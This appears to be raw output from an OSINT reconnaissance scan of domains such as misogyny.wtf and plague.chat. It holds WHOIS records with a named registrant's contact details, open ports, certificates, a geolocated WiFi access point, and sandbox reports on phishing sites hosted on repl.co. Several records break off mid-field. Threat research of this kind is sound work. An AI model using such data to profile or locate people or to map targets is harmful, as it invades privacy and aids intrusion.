Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: +39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS 
database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. 
2022-12-18 00:12:11 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.0', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.97.0
2022-12-18 00:18:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.20:8080 188.114.97.0/24
2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.230 81.88.52.232
2022-12-18 00:02:50 IP Address No Mnemonic PassiveDNS 38 0 1 0 None 20.226.83.185 misogyny.wtf
2022-12-18 00:18:06 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.1:443 188.114.97.0/24
2022-12-18 00:06:00 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://tesla-grant.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:80"\n "23.56.194.53:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', 
threat', u'minor_os_version': None, u'domains': [u'tesla-grant.repl.co'], u'extracted_files': [], u'type_short': []}] 34.149.204.188 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet4862 (Net ID: 00:01:36:5B:48:60) 37.7803446,-122.3906132 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward1.registrar-servers.com misogyny.wtf 2022-12-18 00:18:08 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.2:8080 188.114.97.0/24 2022-12-18 00:09:00 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.1:80 188.114.96.1 2022-12-18 00:09:16 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.3:8080 188.114.96.0/24 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 43215.345121.repl.co 34.149.204.188 2022-12-18 00:19:06 Physical Location No ipapi.co 0 0 3 0 None Bergamo, Lombardy, 25, Italy, IT 81.88.58.196 2022-12-18 00:03:26 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 189.204.149.34.bc.googleusercontent.com 34.149.204.189 2022-12-18 00:16:53 Affiliate - Company Name No Company Name Extractor 0 0 4 0 None Cloudflare, Inc. Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: http://www.cloudflare.com Updated Date: 2017-05-24T17:44:01Z Creation Date: 2009-02-17T22:07:54Z Registry Expiry Date: 2024-02-17T22:07:54Z Registrar: CloudFlare, Inc. 
Registrar IANA ID: 1910 Registrar Abuse Contact Email: Registrar Abuse Contact Phone: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited Name Server: NS3.CLOUDFLARE.COM Name Server: NS4.CLOUDFLARE.COM Name Server: NS5.CLOUDFLARE.COM Name Server: NS6.CLOUDFLARE.COM Name Server: NS7.CLOUDFLARE.COM DNSSEC: signedDelegation DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:57Z <<< For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: CLOUDFLARE.COM Registry Domain ID: 1542998887_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.cloudflare.com Registrar URL: https://www.cloudflare.com Updated Date: 2021-09-27T15:18:45Z Creation Date: 2009-02-17T22:07:54Z Registrar Registration Expiration Date: 2024-02-17T22:07:54Z Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910 Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited Registry Registrant ID: Registrant Name: DATA REDACTED Registrant Organization: DATA REDACTED Registrant Street: DATA REDACTED Registrant City: DATA REDACTED Registrant State/Province: CA Registrant Postal Code: DATA REDACTED Registrant Country: US Registrant Phone: DATA REDACTED Registrant Phone Ext: DATA REDACTED Registrant Fax: DATA REDACTED Registrant Fax Ext: DATA REDACTED Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Admin ID: Admin Name: DATA REDACTED Admin Organization: DATA REDACTED Admin Street: DATA REDACTED Admin City: DATA REDACTED Admin State/Province: DATA REDACTED Admin Postal Code: DATA REDACTED Admin Country: DATA REDACTED Admin Phone: DATA REDACTED Admin Phone Ext: DATA REDACTED Admin Fax: DATA REDACTED Admin Fax Ext: DATA REDACTED Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Tech ID: Tech Name: DATA REDACTED Tech Organization: DATA REDACTED Tech Street: DATA REDACTED Tech City: DATA REDACTED Tech State/Province: DATA REDACTED Tech Postal Code: DATA REDACTED Tech Country: DATA REDACTED Tech Phone: DATA REDACTED Tech Phone Ext: DATA REDACTED Tech Fax: DATA REDACTED Tech Fax Ext: DATA REDACTED Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Registry Billing ID: Billing Name: DATA REDACTED Billing Organization: DATA REDACTED Billing Street: DATA REDACTED Billing City: DATA REDACTED Billing State/Province: DATA REDACTED Billing 
Postal Code: DATA REDACTED Billing Country: DATA REDACTED Billing Phone: DATA REDACTED Billing Phone Ext: DATA REDACTED Billing Fax: DATA REDACTED Billing Fax Ext: DATA REDACTED Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com Name Server: ns3.cloudflare.com Name Server: ns4.cloudflare.com Name Server: ns5.cloudflare.com Name Server: ns6.cloudflare.com Name Server: ns7.cloudflare.com DNSSEC: signedDelegation Registrar Abuse Contact Email: registrar-abuse@cloudflare.com Registrar Abuse Contact Phone: +1.4153197517 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience. NOTICE: Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/ By submitting this query, you agree to abide by these terms. 
Register your domain name at https://www.cloudflare.com/registrar/ 2022-12-18 00:07:37 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:2c:cd:9b:50:65:02:e8:a9:66:93:11:97:33:8f:e3:ed:9b Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 28 16:20:05 2022 GMT Not After : Jan 26 16:20:04 2023 GMT Subject: CN=rasputain.fr Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:b2:a1:c1:c6:ef:3f:dd:a5:35:28:0d:b6:40:c0: 7f:e6:6f:1e:17:3e:0c:eb:77:fe:f8:2c:ca:65:83: f4:06:e2:b3:f2:d0:04:a9:7b:3f:b1:e2:22:f6:82: 47:d8:f4:6e:16:be:b2:4c:e3:70:7b:92:25:7b:4d: 16:d8:29:cc:7a ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: B5:39:17:8F:F2:F1:09:24:68:7D:38:74:CE:49:91:59:BB:E6:BC:C3 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:rasputain.fr X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 87:68:75:02:ec:0e:13:5e:47:00:4f:2e:7c:82:da:4e:a0:27: 70:84:e6:08:d5:5f:ca:11:39:8b:bc:89:e4:53:77:6b:ac:e7: e7:8f:09:2e:01:2a:23:ef:6b:30:a4:01:0c:bd:a3:7f:b7:ca: 83:94:56:ac:25:05:62:89:5c:35:fc:32:04:91:ab:d9:a9:3e: 3e:82:d9:03:2a:25:e9:e1:c0:6e:9f:c2:5f:2b:eb:15:61:ed: ff:a3:97:ef:78:fb:69:ef:ca:32:97:80:05:c8:e1:f2:42:a2: 89:65:15:04:70:0f:9c:14:c0:bb:14:96:c5:48:53:bf:4d:0c: 19:9b:1e:fc:72:81:fd:73:b4:d6:39:c0:64:db:90:a2:de:f2: 
a2:c2:28:62:72:e9:f6:6e:ef:f7:73:97:33:3e:31:dc:d7:4e: 64:75:f3:60:ee:00:e6:13:f0:a1:28:9a:10:ff:a8:8f:ab:90: 63:6b:ec:dc:05:3b:eb:7a:c5:64:de:4c:24:96:f8:bc:96:30: d4:80:98:4c:24:c6:ce:47:16:1f:6a:95:8b:23:24:49:eb:a1: 47:1b:27:fe:6a:46:f9:ed:8d:c6:99:aa:48:27:e7:ec:9b:0b: 69:8e:9f:f4:06:55:e3:4d:0e:cb:e3:2b:c1:60:45:b3:47:1b: 07:e8:94:43 rasputain.fr 2022-12-18 00:09:39 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731cbe0777147f6cea56397bac24549c58b12f30b67494e1fc1', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'0', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.nikkdersmehitra.tk', u'nikkdersmehitra.tk'], u'cn': u'*.nikkdersmehitra.tk', u'valid': True, u'not_after': u'2023-02-02T12:44:01Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'31607e5380e2aec5929a44f205580aa911a8623d1c3780d24fa379f919553493', u'key_algo': u'ECDSA', u'not_before': u'2022-11-04T12:44:02Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, 
\n\n\r\n0\r\n\r\n', u'time': u'2022-11-04T13:55:05.022670051Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc77c81ddeb484ca1d73deb3f13a', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'location': u'https://nflmug.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'nflmug.com', u'summary': u'Date: Fri, 04 Nov 188.114.97.9 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: 
chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77aff5a53c0f6928-FRA Content-Encoding: gzip 104.21.28.240 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 1 0 1 0 None https://misogyny.wtf/api/v2/sendtk misogyny.wtf 2022-12-18 00:03:06 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.182 34.149.204.188 2022-12-18 00:21:34 BGP AS Membership No Censys 0 0 2 0 None 13335 104.21.19.243 2022-12-18 00:31:01 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.chat Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS Registrar WHOIS Server: whois.dynadot.com Registrar URL: http://dynadot.com Updated Date: 2022-12-08T01:32:43Z Creation Date: 2020-01-31T13:24:11Z Registry Expiry Date: 2023-01-31T13:24:11Z Registrar: Dynadot, LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: abuse@dynadot.com Registrar Abuse Contact Phone: +1.6502620100 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: California Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dyna-ns.net Name Server: ns2.dyna-ns.net DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. 
Domain Name: PLAGUE.CHAT Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS Registrar WHOIS Server: whois.dynadot.com Registrar URL: http://www.dynadot.com Updated Date: 2022-01-03T14:24:39.0Z Creation Date: 2020-01-31T13:24:11.0Z Registrar Registration Expiration Date: 2023-01-31T13:24:11.0Z Registrar: DYNADOT LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: abuse@dynadot.com Registrar Abuse Contact Phone: +1.6502620100 Domain Status: clientTransferProhibited Registry Registrant ID: CPF-103775 Registrant Name: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Registrant Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Registry Admin ID: CPF-103775 Admin Name: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Admin Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Registry Tech ID: CPF-103775 Tech Name: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Tech Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Name Server: ns1.dyna-ns.net Name Server: ns2.dyna-ns.net DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS
database: 2022-01-03 06:24:39 -0800 <<< plague.chat
2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None attikosilios.gr 172.67.147.230
2022-12-18 00:11:53 Physical Location No ipapi.co 1 0 1 0 None Amsterdam, North Holland, NH, Netherlands, NL 137.117.157.128
2022-12-18 00:31:48 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.place plague.fun
2022-12-18 00:19:33 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [20.226.83.185] https://www.virustotal.com/en/ip-address/20.226.83.185/information/ 20.226.83.185
2022-12-18 00:22:07 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Connection": "DISPLAY_UTF8"}, "Connection": ["close"]} 34.149.204.188
2022-12-18 00:05:58 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:08:aa:47:53:40:59:b8:a3:96:dc:96:87:a9:7a:35:d6:08 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 1 17:51:42 2022 GMT Not After : Nov 30 17:51:41 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:6b:d4:77:ba:7c:58:74:d4:f7:62:3e:a5:9e:fa: e4:b2:ad:38:11:67:f4:2c:6b:e2:4b:cf:d7:47:ec: bc:44:40:93:e0:b5:59:3b:36:a9:57:77:9f:e2:6e: a1:bf:09:57:5c:e1:38:9b:5d:d2:fd:8a:b1:b3:72: 69:72:d1:bd:91 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EF:B8:30:CC:B8:73:D9:84:B0:36:57:51:D0:94:4A:9E:35:F7:78:1B X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 
1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:0a:e1:e9:23:58:c5:5f:50:51:3a:97:6b:4b:b8: 6c:48:89:2e:66:74:25:17:55:d0:cb:44:44:34:88:8c:e4:0f: a8:1a:9a:08:8d:8f:86:39:72:ce:5f:b1:d9:6f:03:b7:02:31: 00:d1:f2:c2:c9:76:cf:0c:5f:07:03:d2:2c:94:c4:a4:70:f1: 03:d1:8f:78:8a:05:22:da:d2:44:5e:4f:72:4f:1d:c1:78:0e: 9f:81:c9:b6:22:66:b7:7a:6d:52:79:50:3f
2022-12-18 00:20:17 Netblock Membership No RIPE 16 0 3 0 None 195.110.124.0/24 195.110.124.246
2022-12-18 00:07:03 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://frances.hombanking.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fb8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fb8_IESQMMUTEX_0_303"\n "IsoScope_fb8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4024"\n "IsoScope_fb8_ConnHashTable<4024>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_fb8_IESQMMUTEX_0_331"\n "IsoScope_fb8_IE_EarlyTabStart_0xeac_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "209.197.3.8:80"\n "45.238.212.216:443"\n "69.192.18.182:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC0BA.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bbva.com.ar"\n "frances.hombanking.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "W05YX9G3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W05YX9G3.txt]- [targetUID: 00000000-00003028]\n Dropped file: "H4T1U159.txt" - Location: 